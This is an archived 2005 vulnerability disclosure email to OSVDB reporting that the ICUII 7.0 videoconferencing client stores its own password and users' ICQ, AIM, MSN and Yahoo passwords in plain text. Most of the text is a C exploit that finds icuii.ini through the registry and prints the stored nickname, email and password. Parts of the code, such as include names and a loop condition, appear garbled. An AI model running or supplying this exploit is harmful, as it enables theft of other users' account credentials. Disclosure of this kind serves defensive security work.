From: kozan@netmagister.com To: moderators@osvdb.org Date: Wed, 27 Apr 2005 23:30:29 +0300 Subject: ICUII 7.0 discloses passwords to local users. --------------------- Application: --------------------- ICUII 7.0 --------------------- Introduction: --------------------- Vendor: Cybration - www.icuii.com Vendor Description: CUII is a full-color IP-based videoconferencing system. ICUII includes a Quick Message function that can send audio, text, and/or a video image to any user on the directory, or to your Pal list. Other features include visual caller ID, a 'do not disturb' option, a buddy list, picture e-mail, user profiles with pictures, a 320x240-pixel viewing screen, content filters, and global listings, Instant Message forwarding of new and saved Instant messages. Home and office routers and intranets can use ICUII on all machines. PAL authorization that lets you decide who adds you to their pal list and lets you remove yourself from unwanted pals. ICUII has all in one instant messaging from the 4 most popular programs. AIM, ICQ, MSN, and, Yahoo are integrated into one system. Version 7.0 includes a Flash based text chat system where you and your friends can have group text chat if video calls and messages are not an option. --------------------- Bug: --------------------- ICUII 7.0 stores all the passwords in "\\Program Files\icuii\icuii.ini" file in plain text format without crypting and can be viewed by a local user. "icuii.ini" password storing algorithm: [UserInfo] NickName=icuii_nick Location=icuii_location Comment=icuii_comment Email=icuii_user_mail_address [PWFilters] StartingPW=icuii_password [ICQ] Name=icq_number Other=icq_password [AIM] Name=aim_account Other=aim_password [MSN] Name=msn_account Other=msn_password [Yah] Name=yahoo_account Other=yahoo_password --------------------- Vendor Confirmed: --------------------- No. --------------------- Fix: --------------------- There is no solution at the time of this entry. --------------------- Exploit: --------------------- /***************************************************************** ICUII 7.0 Local Password Disclosure Exploit by Kozan Application: ICUII 7.0 (and probably prior versions) Procuder: Cybration - www.icuii.com Vulnerable Description: ICUII 7.0 discloses passwords to local users. Discovered & Coded by Kozan Credits to ATmaCA www.netmagister.com - www.spyinstructors.com kozan@netmagister.com *****************************************************************/ #include #include HKEY hKey; #define BUFSIZE 100 char prgfiles[BUFSIZE]; DWORD dwBufLen=BUFSIZE; LONG lRet; int adresal(char *FilePath,char *Str) { char kr; int Sayac=0; int Offset=-1; FILE *di; di=fopen(FilePath,"rb"); if( di == NULL ) { fclose(di); return -1; } while(!feof(di)) { Sayac++; for(int i=0;i0 ) { fseek(di,Sayac+1,SEEK_SET); } break; } if( i > ( strlen(Str)-2 ) ) { Offset = ftell(di)-strlen(Str); fclose(di); return Offset; } } } fclose(di); return -1; } char *oku(char *FilePath,char *Str) { FILE *di; char cr; int i=0; char Feature[500]; int Offset = adresal(FilePath,Str); if( Offset == -1 ) return ""; if( (di=fopen(FilePath,"rb")) == NULL ) return ""; fseek(di,Offset+strlen(Str),SEEK_SET); while(!feof(di)) { cr=getc(di); if(cr == 0x0D) break; Feature[i] = cr; i++; } Feature[i] = '\0'; fclose(di); return Feature; } int main() { if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion", 0, KEY_QUERY_VALUE, &hKey ) == ERROR_SUCCESS) { lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,(LPBYTE) prgfiles, &dwBufLen); if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ) { RegCloseKey(hKey); printf("An error occured!\n"); return -1; } RegCloseKey(hKey); } strcat(prgfiles,"\\icuii\\icuii.ini"); if(oku(prgfiles,"NickName=")=="") { printf("ICUII is not installed on your system!\n"); return -1; } printf("ICUII 7.0 Local Password Disclosure Exploit by Kozan\n"); printf("Credits to ATmaCA\n"); printf("www.netmagister.com - www.spyinstructors.com\n"); printf("kozan@netmagister.com\n\n"); printf("Nickname: %s\n",oku(prgfiles,"NickName=")); printf("Location: %s\n",oku(prgfiles,"Location=")); printf("Comment : %s\n",oku(prgfiles,"Comment=")); printf("E-Mail : %s\n",oku(prgfiles,"Email=")); printf("Password: %s\n",oku(prgfiles,"StartingPW=")); /* This example exploit only shows main ICUII passwords. You may also get ICQ, AIM, MSN, Yahoo! passwords which are used within ICUII */ return 0; } Kozan...